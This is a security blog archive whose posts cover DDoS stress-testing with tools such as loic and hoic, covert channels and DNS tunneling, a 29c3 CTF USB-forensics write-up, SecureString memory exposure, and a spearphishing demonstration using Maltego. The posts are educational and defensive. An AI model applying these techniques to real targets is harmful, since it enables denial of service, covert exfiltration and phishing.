Surviving the Robot Apocalpyse

Archive for the ‘Security’ Category

Surviving the Robot Apocalpyse

Posted by

I am on the latest BSides Chicago podcast episode: The Taz, the Wolf, and the exclusives. Security Moey interviewed me about a new talk I am developing for Chicago, titled Surviving the Robot Apocalypse.

The inspiration comes from Twitter. Tazdrumm3r once said, “@jwgoerlich <~~ My theory, he’s a Terminator from the future programmed 4 good 2 rally & lead the fight against SkyNet, MI branch.” A few weeks back, we were discussing the robotics articles I wrote for Servo magazine and some ‘bots I built with my son. To which, Infosec_Rogue said, “@jwgoerlich not only welcomes our robot overlords, he helped create them.”

I can roll with that. Let’s do it.

The goal of this session is to cover software security and software vulnerabilities in an enjoyable way. Think Naked Boulder Rolling and Risk Management. Unless, of course, you didn’t enjoy Naked Boulder Rolling. In that case, imagine some other talk I gave that you enjoyed. Or some other talk someone else gave that you enjoyed. Yeah. Pick one. Got it? Surviving is like your favorite talk, only for software security principles and their applicability to InfoSec.

I hope to see you in Chicago.

 

Surviving the Robot Apocalypse

Abstract: The robots are coming to kill us all. That, or the zombies. One way or the other, humanity stands on the brink. While many talks have focused on surviving the zombie apocalypse, few have given us insights into how to handle the killer robots. This talk seeks to fill that void. By exploring software security flaws and vulnerabilities, we will learn ways to bypass access controls, extract valuable information, and cheat death. Should the unthinkable happen and the apocalypse not come, the information learned in this session can also be applied to protecting less-than-lethal software. At the end of the day, survival is all about the software.

Privilege management at CSO

Posted by

Least Privilege Management (LPM) is in the news …

The concept has been around for decades. J. Wolfgang Goerlich, information systems and information security manager for a Michigan-based financial services firm, said it was, “first explicitly called out as a design goal in the Multics operating system, in a paper by Jerome Saltzer in 1974.”

But, it appears that so far, it has still not gone mainstream. Verizon’s 2012 Data Breach Investigations Report found that, of the breaches it surveyed, 96% were not highly difficult for attackers and 97% could have been avoided through simple or intermediate controls.

“In an ideal world, the employee’s job description, system privileges, and available applications all match,” Goerlich said. “The person has the right tools and right permissions to complete a well-defined business process.”

“The real world is messy. Employees often have flexible job descriptions. The applications require more privileges than the business process requires,” he said. “[That means] trade-offs to ensure people can do their jobs, which invariably means elevating the privileges on the system to a point where the necessary applications function. But no further.”

Read the full article at CSO: Privilege management could cut breaches — if it were used

Considerations when testing Denial of Service

Posted by

Stress-testing has long been a part of every IT Operations toolkit. When a new system goes in, we want to know where the weaknesses and bottlenecks are. Stress-testing is the only way.

Now, hacktivists have been providing stress-tests for years in the form of distributed denial of service attacks. Such DDoS are complementary with just about any news event. As moves are underway to make DDoS a form of free speech, we can expect more in the future.

With that as a background, I have been asked recently for advice on how to test for a DDoS. Here are some considerations.

First, test on the farthest router away that you own. The “you own” part is essential. Let’s not run a DDoS across the public Internet or even across your hosting provider’s network. That is a quick way to run afoul of terms of service and, potentially, the law. Moreover, it is not a good test. A DDoS from, say, home will be bottlenecked by your ISP and the Internet backbone (1-10 Mbps). A better test is off the router interface (100-1000 Mbps).

Second, use a distributed test. A distributed test is a common practice when stress-testing. It required to get a D in the DDoS. Alright, that was a bad joke. The point is that you want to remove individual device differences from affecting the test, such as a bottleneck within the OS or the testing application. My rule of thumb is 5:1. So if you are testing one router interface at 1 Gbps, you would want to send 5 Gbps of data via five separate computers.

Third, use a combination of traditional administration tools and the tools in use for DDoS. Stress-test both the network layer and the HTTP layer of the application. If I were to launch a DDoS test, I would likely go with iperf, loic, and hoic. Check also for tools specific to the web server, such as ab for Apache. Put together a test plan with test scripts and repeat this plan in a consistent fashion.

Forth, test with disposable systems. The best test machine is one with a basic installation of the OS, the test tools, and the test scripts. This minimizes variables in the test. Also, while rare, it is not unheard of for tools like loic and hoic to be bundled with malicious software. Once the test is complete, the systems used for testing should be re-imaged before returned to service.

Let’s summarize by looking at a hypothetical example. Assume we have two Internet routers, two core routers, two firewalls, and then two front-end web servers. All are on 1 Gbps network connections. I would re-image five notebooks with a base OS and the DDoS tools. With all five plugged into the network switch on the Internet routers, I would execute the DDoS test and collect the results. Then repeat the exact same test (via script) on the core routers network, on the firewall network, and on the web server network. The last step is to review the entire data set to identify bottlenecks and make recommendations for securing the network against DDoS.

That’s it. These are simple considerations that reduce the risk and increase the effectiveness of DDoS testing.

Incog: past, present, and future

Posted by

I spent last summer tinkering with covert channels and steganography. It is one thing to read about a technique. It is quite another to build a tool that demonstrates a technique. To do the thing is to know the thing, as they say. It is like the art student who spend time duplicating the work of past masters.

And what did I duplicate? I started with the favorites: bitmap steganography and communication over ping packets. I did Windows-specific techniques such as NTFS ADS, shellcode injection via Kernel32.dll, mutexes, and RPC. I also replicated Dan Kaminsky’s Base32 over DNS. Then I tossed in a few evasion techniques like numbered sets and entropy masking.

Incog is the result of this summer of fun. Incog is a C# library and a collection of demos which illustrate these basic techniques. I released the full source code last fall at GrrCon. You can download Incog from GitHub.

If you would like to see me present on Incog, including my latest work with new channels and full PowerShell integration, I am up for consideration for Source Boston 2013.

 

Please vote here: https://www.surveymonkey.com/s/SRCBOS13VS

This year SOURCE Boston is opening up one session to voter choice. Please select the session you would like to see at SOURCE Boston 2013. Please only vote once (we will be checking) and vote for the session you would be the most interested in seeing. Voting will close on January 15th.

OPTION 5: Punch and Counter-punch with .Net Apps, J Wolfgang Goerlich, Alice wants to send a message to Bob. Not on our network, she won’t! Who are these people? Then Alice punches a hole in the OS to send the message using some .Net code. We punch back with Windows and .Net security configurations. Punch and counter-punch, breach and block, attack and defend, the attack goes on. With this as the back story, we will walk thru sample .Net apps and Windows configurations that defenders use and attackers abuse. Short on slides and long on demo, this presentation will step thru the latest in Microsoft .Net application security.

Write-up of the 29c3 CTF “What’s This” Challenge

Posted by

Subtitled: “How to capture a flag in twelve easy days”

The 29th Chaos Communication Congress (29C3) held an online capture the flag (CTF) event this year. There were several challenges, which you can see at the CTF Time page for the 29c3 CTF. I spent most of the time on the “What’s This” challenge. The clue was a USB packet capture file named what_this.pcap.

The first thing we did was run strings what_this.pcap and look at the ASCII and Unicode strings in the capture. ASCII: CASIO DIGITAL_CAMERA 1.00, FAT16, ACR122U103h. Unicode: CASIO QV DIGITAL, CASIO COMPUTER, CCID USB Reader.

The second thing we did was to open the capture in Wireshark 1.84. (Using the lastest version of Wireshark is important as the USB packet parser is still being implemented.) We knew Philip Polstra had covered USB forensics in the past, such as at GrrCon, and Philip pointed us to http://www.linux-usb.org/usb.ids for identifying devices. We see a Genesys Logic USB-2.0 4-Port HUB (frame.number==2), a Linux Foundation USB 2.0 root hub (frame.number==4), Holtek Semiconductor Shortboard Lefty (frame.number==32, 42), a Casio Computer device (frame.number==96, 106), and another Casio Computer device (frame.number==1790).

Supposition? The person is running Linux with a keyboard, Casio camera, and smart card (CCID) reader attached over USB. A Mifare Classic card (ACR122U103) is swiped on the CCID reader. The camera is mounted (FAT16) and a file or files are read from the device.

Next, we extracted the keystrokes. I had previously written a simple keystroke analyzer for the CSAW CTF Qualification Round 2012. This simply took the second byte in the USB keyboard packets (URB_INTERRUPT) and added 94. This meant the alphabetical characters were correct, however, all special characters and linefeeds were lost. The #misec 29c3 CTF captain, j3remy, passed along a lookup table. Using this lookup table, we found the following keystrokes:

dmeesg
mmouunt t vfaat //ddev/ssdb1 /usb
ccd usb
llss —l
fiille laagg
dmmeessg
nfc-lsisst
ccat flaag \ aespipe -p 3 -d 3,,, nffs-llisst \c-llisst \ grrep uuid \ cut =-d -f 10\ dd sbbs=113 couunnt=2

There are a number of problems with this method of analyzing keystrokes. First, when the key is held down too long, we get multiple letters (dmeesg). Second, special keys like shift and backspace are ignored. I redid my parser to read bytes 1, 2, and 3. The first byte in a keyboard packet is whether or not shift is depressed. The second byte is the character (including keys like enter and backspace). The third byte is the error code for repeating characters. Using this information, I mapped the HID usage tables toMicrosoft’s SendKeys documentation and replayed the packet file into Notepad.

dmesg
mount -t vfat /dev/sdb1 usb
cd usb
ls -l
file  lag
dmesg
nfc-list
cat flag | aespipe -p 3 -d 3<<< "`nfc-list | grep UID | cut -d  " " -f 10-| dd bs=13 count=2`"

Supposition? The person at the keyboard plugged in the Casio camera and mounted it to usb. He listed the folder contents, then scanned for the Mifare Card (nfc-list lists near field communications devices via ISO14443A). Once confirmed, he read the flag from the camera and decrypted it via AES 128-bit encryption in CBC mode (man aespipe). The passcode was the UID of the Mifare Card in bytes (nfc-list | grep | cut | dd). To find the flag, we need both the UID and the flag file.

The hard work of finding the UID was done by j3remy. He followed the ACR122U API guide and traced the calls/responses. For example, frame.number==1954 reads Data: ff 00 00 00 02 d4 02, or get (ff) the firmware (2d d4). The response comes in frame.number==1961 Data: 61 08, 8 bytes coming with the firmware. Then frame.number==1966, Data: ff c0 00 00 00 08, get (ff) read (c0) the 8 bytes (08). And the card reader returns the firmware d5 03 32 01 06 07 90 00 in frame.number==1973. j3remy likewise parsed the communications and found frame.number==3427 which reads: d54b010100440007049748ba3423809000

d5 4b == pre-amble
01 == number of tag found
01 == target number
00 44 == SNES_RES
07 == Length of UID
04 97 48 ba 34 23 80 == UID
90 00 == Operation finished

The next step was to properly format the UID as the nfc-list command would display it. This took some doing. Effectively, there are 4 blank spaces before ATQA, 7 blank spaces before UID, and 6 spaces before SAK. There is one space after : and before the hexadecimal value. Each hexadecimal value is double-spaced. With that in mind, we created an nfc-list.txt file:

    ATQA (SENS_RES): 00  44
       UID (NFCID1): 04  97  48  ba  34  23  80
      SAK (SEL_RES): 00

Determining the spacing took some time. Once we had it, we could run the cat | grep | dd command and correctly return 26 bytes of ASCII characters.

$ echo "`cat nfc-list.txt | grep UID | cut -d  " " -f 10-| dd bs=13 count=2`"
2+0 records in
2+0 records out
26 bytes (26 B) copied, 6.2772e-05 s, 414 kB/s
04  97  48  ba  34  23  80

To recap: we have the UID, we have correctly converted the UID to a AES 128-bit decryption key, and we are now ready to decrypt the file. How to find the file, though? Rather than reverse engineering FAT16 over USB, we took a brute force approach. We exported all USB packets with data into files named flagnnnn (where nnnn was the frame.number). We then ran the following script:

FILES=flag*
for f in $FILES
do
    echo -e \n Processing $f file… \n
    cat $f | aespipe -p 3ls -d 3<<< `cat nfc-list.txt | grep UID | cut -d ‘ ‘ -f 10-| dd bs=13 count=2`
done

There it was. In the file flag1746, in the frame.number==1746, from the Casio camera (device 26.1) to the computer (host), we found a byte array that decrypted properly to:

29C3_ISO1443A_what_else?

What else, indeed? Well played.

Special thanks to Friedrich (aka airmack) and the 29c3 CTF organizers for an enjoyable challenge. Thanks for j3remy for captaining the #misec team and helping make sense of the ACR122 API. Helping us solve this were Philip Polstra and PhreakingGeek. It took a while, but we got it!

Not-so-secure implementations of SecureString

Posted by

Microsoft .Net has an object for safely and securely handling passwords: System.Security.SecureString. “The value of a SecureString object is automatically encrypted, can be modified until your application marks it as read-only, and can be deleted from computer memory by either your application or the .NET Framework garbage collector”, according to the MSDN documentation. As with any security control, however, there are a few ways around it. Consider the following PowerShell and C# code samples.

 

# Some not-so-secure SecureString from a vendor whitepaper
password = Read-Host -AsSecureString -Prompt “Please provide password”

// Some not-so-secure SecureString code I wrote by mistake
private void button1_Click(object sender, RoutedEventArgs e)
{
  secretString = new SecureString();
foreach (char c in textBox1.Text.ToCharArray()) { secretString.AppendChar(c); }
  textBox1.Text = “”;
}

Try the samples above. Use something like Mandiant’s Memoryze or AcessData FTK Imager to get a copy of your current Windows memory. Search the memory for your password and, sure enough, you will find it in clear text. Sometimes, as with the C# code, you will find your password several times over.

What happened? In both cases, the value was passed to the SecureString in clear text. The SecureString is encrypted, however, the original input is not. That input value may stay in memory for a long time (depending what the underlying Windows OS is doing.)

Below are some examples of populating a SecureString in such a way that the password is not exposed in clear text. A the saying goes, trust but verify. In this case, trust the method but check using Memoryze or Imager to be certain.

 

# A secure SecureString implementation
$password = New-Object System.Security.SecureString
do {
  $key = $host.UI.RawUI.ReadKey(“NoEcho,IncludeKeyDown”)
  if ($key.Character -eq 13) { break }
  $password.AppendChar($key.Character)
} while (1 -eq 1)

// A more SecureString code example
private void button1_Click(object sender, RoutedEventArgs e)
{
  secretString = passwordBox.SecurePassword;
  passwordBox1.Clear();
}

Steven Fox’s Social Illusion

Posted by

Steven Fox (@SecureLexicon) has been giving a series of talks on creating social illusions. Last Friday, I joined Steven at EMU where he was presenting as part of EMU’s IA summer workshop series. The topic was spearphishing. Steven demonstrated using Maltego to create an email, while Evan Malamis showed how the Social Engineer Toolkit could weaponize and distribute the email.

Let’s suppose Steven was deliberately targeting someone who attended BSidesDetroit. What should the email look like, and who should it be from?

The first thing Steven did was create a social network nodal graph from BSidesDetroit. By navigating the graph, it became obvious there was a tight network bond between Matt Johnson, Derek Thomas, and myself. There was an “ah ha!” moment as Steven explained how a message to a target could be sent from any one of us three.

Now what topic should the email use? Steven pivoted Maltego and pointed out an interesting relationship between BSidesDetroit  and BSidesChicago. So he graphed BSidesChicago, and looked for intersections. From there, he probed to see how those intersections touched upon Matt, Derek, and me.

Out popped a tweet from Mr. Minion on the Chicago ISACA/ISSA boat cruise. Steven pulled the tweet and resulting social interactions into another graph. There, it became obvious that #misec was involved. Steven was able to pull out several key pieces of information, including URLs and the like.

The final step of the process was to write the email. Essentially, Steven combined Maltego results with some Google fu to determine how #misec would pitch an event. The look, the feel, and the tone of the message were carefully crafted. Steven even perfectly emulated my writing style. (Take a look for yourself here.)

How successful was this forgery? Consider the following three pieces of evidence.

First, one person immediately commented: “Does that count? We all know the #misec guys are doing this boat thing.” Except we are not. The interesting thing is that #misec is not actively planning a river cruise. Yet the email was so well done that the audience immediately assumed we were.

Once that was explained, another person went: “It is funny you mention the cruise. I would have clicked on it because I remember Elizabeth Martin talking about Detroit doing a boat cruise.” This turned out to be a case of person’s memory adjusting to fit the facts they saw in front of them. Checking with Elizabeth, she did not talk about the cruise during BSidesDetroit at all.

Actually, the Twitter buzz preceeded me checking with Elizabeth Martin. All the buzz led Elizabeth to the logical conclusion that there was a cruise, and she spent an hour researching boats for our event. She later tweeted out: “The best part is I thought I was supposed to plan a cruise so I started working on it!”

Think about that for a moment. Steven Fox effectively invented an event. He crafted a message so accurate that it caused people to remember it, had people believing it was actually happening, and effectively created its own reality. Talk about creating social illusions!

Software support for password strength

Posted by

Xkcd is the QED of our industry. Want proof? Check out Randall Munroe’s comic on Password Strength.

Longer phrases trump mixed up passwords every time. “Correcthorsebatterystaple” will take significantly longer to crack than, say, “p@ssw0rd”. Given this, you might wonder why the industry has not changed to longer phrases. I blame the vendors. There are a number of apps that I support and websites that I visit that still limit passwords to 14 characters. Moreover, many explicitly for prevent special characters. Software support is a problem.

There are other problems, too. See today’s Dark Reading article for the pros and cons of using phrases.

Dark Reading: Passphrases A Viable Alternative To Passwords?

There is a wish among some enterprise users that they could institute phrases, but they’re experiencing a technology lag within the software and identity management worlds that stymies the urge.

“One reason (organizations don’t use passphrases) is the number of software applications that do not support long or complex passphrases,” says J. Wolfgang Goerlich, Network Operations and Security Manager for a midwest financial services firm. “Length and special characters seem to be a challenge for some vendors. Sometimes referred to as technological debt, many IT departments must maintain a suite of apps that have not been updated with modern security recommendations.”

DNS covert channels

Posted by

I am having some fun with DNS and covert channels over the holidays.

At its most simplest, DNS can be used as a text based covert channel. The DNS client sends the message via a CNAME lookup. The DNS server sends a message in response via a CNAME response. By co-opting this process, any character sequence can be sent back and forth.

What if we need to do more? Say, transfer a file? Or even browse the web? The answer here is text encoding.

Most IT folks would jump to the conclusion that the traffic simply needs to be Base64 encoded. There is a slight wrinkle. DNS CNAME queries only support 63 characters: alphabetical lower case, upper case, numeric, and dash (-). Base64 encoding is out.

The next possibility is Base32 encoding. While not often used, it fits within the DNS RFC and therefore works out of the box.

The disadvantages of Base32 over DNS is packet payload size and transmissions. DNS is UDP and, therefore, may suffer from dropped packets. Further, the packets can only be so long.  DNS host names are limited to 255 characters.

Dan Kaminsky came up with an interesting solution to these problems. He essentially tunneled IP over DNS using Base32 encoding. Such protocol layering handles the limitations of UDP. To increase the size, Kaminsky relied on the EDNS0 extension specified in RFC 2671. He released a proof of concept in the form of the OzymanDNS Perl scripts.

As a side note, the name OzymanDNS had me curious. I did some digging. It is a Watchmen comics reference which, in turn, traces back to an Egyptian pharaoh. Nothing says secret writings like comic books and pharoahs.

Anyways, in sum, covert channels over DNS are practical. With some clever protocol manipulation, binary files and even web browsing can be tunneled over DNS.

Small Business Security Advantages

Posted by

I have had some great conversations since Raf Los (@Wh1t3Rabbit) posted his podcast Monday. Much of the talk has been around some advantages that we do have.

Down the Rabbithole – Episode 4 – Effective Small Business Security
http://podcast.wh1t3rabbit.net/down-the-rabbithole-episode-4-effective-small-business-security

First, information security is a scaling problem.

I have a staffing rule of thumb. I have posted it before, but I’ll repeat it. Take the employees, networked devices, and IT support staff. Security is 1 FTE per 1K employees, 1 FTE per 5K devices, or 1 FTE per 20 IT employees. Most security folks that I have talked with fall within this range, whether they work with multi-nationals or mom-and-pop shops.

This applies to my case. I am dedicated 25% to security. I have 250 end users and around a thousand end-points, servers, switches, routers, and firewalls. Luckily we have more than 5 IT folks, but you get the idea.

The scopes of security challenges remain consistent regardless of the scale. But we on the small medium business side do have a few unique opportunities.

Information security pros at the SMB level have advantages.

Reach. There are fewer layers between us and executive management. The board level directives can flow right into our security planning. There are fewer layers between us and line employees. The security controls can flow right into their daily activities. Communications are simpler in smaller organizations.

Flexibility. If you are an army of one, not much time is needed for generalship. Reaction and response can be quicker. Process and procedure can be reduced, in favor of action and implementation.

Cooperation. Baking security in means getting buy in from the IT operations team, the software development team, the IT engineering folks, the project managers, the business analysts, and IT management. With separate teams, this can mean significant work just to navigate the politics. More time can be spent on implementing and less on negotiating when all the folks are in one team.

End-to-end. One dedicated InfoSec pro in a company with less than 5K devices can hold the entire network in his mind. Two dedicated FTEs and 10K devices, and you’ll end up naturally dividing the work between each other. Reach 100K devices secured by 20 InfoSec guys, and one person knowing every nut-and-bolt becomes impossible.

A small network can be a very secure network.

Security flaws come from the people creating the security controls in a vacuum with no relation to the organization’s mission. Security flaws come from people working on the front lines, with no ideas of the control environment. Flaws come from projects without security tasks, from systems that go-live without security review, and from bolted-on security features. Flaws and weaknesses crop up in the gaps of responsibility between teams, and between people.

A security pro in a small medium business is in a position to make a significant contribution to their organization.